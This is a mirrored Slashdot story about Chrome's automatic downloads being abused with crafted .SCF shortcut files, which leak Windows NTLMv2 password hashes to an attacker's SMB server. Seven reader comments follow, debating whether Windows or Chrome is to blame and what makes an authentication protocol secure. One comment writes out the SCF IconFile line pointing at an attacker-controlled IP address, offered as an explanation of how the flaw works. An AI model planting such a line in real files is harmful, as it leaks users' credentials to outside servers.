Slashdot Mirror

← Back to Stories (view on slashdot.org)

Stealing Windows Credentials Using Google Chrome (helpnetsecurity.com)

Posted by EditorDavid on from the browser-bugs dept.

Orome1 writes: A default setting in Google Chrome, which allows it to download files that it deems safe without prompting the user for a download location, can be exploited by attackers to mount a Windows credential theft attack using specially-crafted SCF shortcut files, DefenseCode researchers have found. What's more, for the attack to work, the victim does not even have to run the automatically downloaded file. Simply opening the download directory in Windows File Explorer will trigger the code icon file location inserted in the file to run, and it will send the victim's username, domain and NTLMv2 password hash to a remote SMB server operated by the attackers.

7 of 53 comments (clear)

  1. Firewall Blocked by darkain · · Score: 5, Informative

    And this is EXACTLY why all of the LAN > WAN firewalls I manage have SMB/CIFS blocked. There is no reason to send that traffic over WAN. If it is needed for connection to a remote location, that's what a VPN connection is for.

  2. Not a browser problem by omnichad · · Score: 3, Insightful

    This is a Windows problem, not a Chrome problem. Windows shouldn't be sending out credentials unless it knows they belong to the server it's authenticating with. This is like visiting a random web page on the Internet and Chrome helpfully filling in the login box with your bank username and password.

    1. Re:Not a browser problem by jargonburn · · Score: 3, Insightful
      Simple: downloading this specially crafted .scf has absolutely no effect....until it is opened/parsed by the application "Windows Explorer". The vulnerability is in Explorer, not Chrome.

      It'd be like saying that downloading a specially crafted PDF file that will compromise your computer when it's opened is a browser problem. Well, since opening Explorer to your downloads folder is a bit more innocuous, it's a bit worse than that.

    2. Re:Not a browser problem by Hank+the+Lion · · Score: 5, Informative

      Mod parent (and GGP) up.
      This is a Widows vulnerability in the way link files are handled, that is mischaracterised as a Chrome vulnerability by the author of the article.
      Link files (.LNK and .SCF as well as autorun.inf and maybe others) do not contain the pretty icon that is shown in Windows Explorer, but contain a link address to the file containing the icon.

      [Shell]
      IconFile=MyPic.ico, or
      IconFile=MyProgram.exe

      This is the case that was originally targeted by the developers of Windows.
      Then came network filesystems. Now, this would also work:
      IconFile=\\MyServer\Dir\MyProgram.exe, or even worse:
      IconFile=\\180.180.180.180\Dir\MyProgram.exe, where 180.180.180.180 is a server under control of the attacker.

      When connecting to a server, Windows helpfully sends your current login credentials, to prevent you from having to re-type them every time.
      Only when these do not work does it display a login prompt.

      The catch is, that, when you open the directory in which the file is stored in Explorer, the icon is needed for display, and the scf file specifies an icon file on a remote server. So, Explorer accesses the remote server, and the underlying network file system sends your login credentials.

      Google has tried to mitigate this problem by adding a .download extension to .LNK files, but had overlooked that .SCF can do exactly the same. Ultimately, this is not Google's fault. The Windows network system should not send login credentials to a server that the user hasn't authenticated to manually before, or should only use authentication mechanisms that are immune to replay attacks or brute forcing. See Wafflemonster's post above.

      This is an issue that should be addressed by Microsoft for once and for all at the filesystem level, not by browser makers with patchwork on a case-by-case basis.

    3. Re:Not a browser problem by scdeimos · · Score: 2

      This is absolutely a Windows problem. It's Windows Explorer initiating the connection and it should *not* be doing that for any files that have a Zone.Identifier alternate data stream (i.e.: any file downloaded from the internet that hasn't yet had the Unblock button clicked in its Properties tab).

  3. Re: NTLM - the gift that keeps on giving by WaffleMonster · · Score: 2

    Different AC here; what are some examples of authentication protocols that you consider secure?

    Any PAKE with a zero knowledge proof...e.g. SRP, JPAKE.
    https://en.wikipedia.org/wiki/...

    Specifically with regards to MS-CHAPv2 and Kerberos to be secure it MUST NOT be possible to use material from authentication challenges or responses to conduct an offline brute force password guessing campaign because majority of user passwords are simply unable to withstand one.

    I consider an authentication protocol to be secure if it is able to meet all of the following requirements:

    1. Authenticating against an attacker places the user at zero risk.
    2. Mutual authentication... if login is successful it means trust relationship is bidirectional.
    3. Provides session keys for encrypting subsequent communication channel
    4. Secure against MITM
    5. Does not leak ANY knowledge that can be used for offline compromise

  4. Re: NTLM - the gift that keeps on giving by buchanmilne · · Score: 2

    The Kereberos *protocol* does, as far as I know, satisfy these requirements.

    Can you provide any evidence of any implementation besides Microsoft's, not satisfying the requirements in a typical configuration?

    Yes, Microsoft's implementation of a Kerberos KDC seems to be broken due to having backwards-compatibility with NTLM, but that doesn't mean that the protocol itself is broken.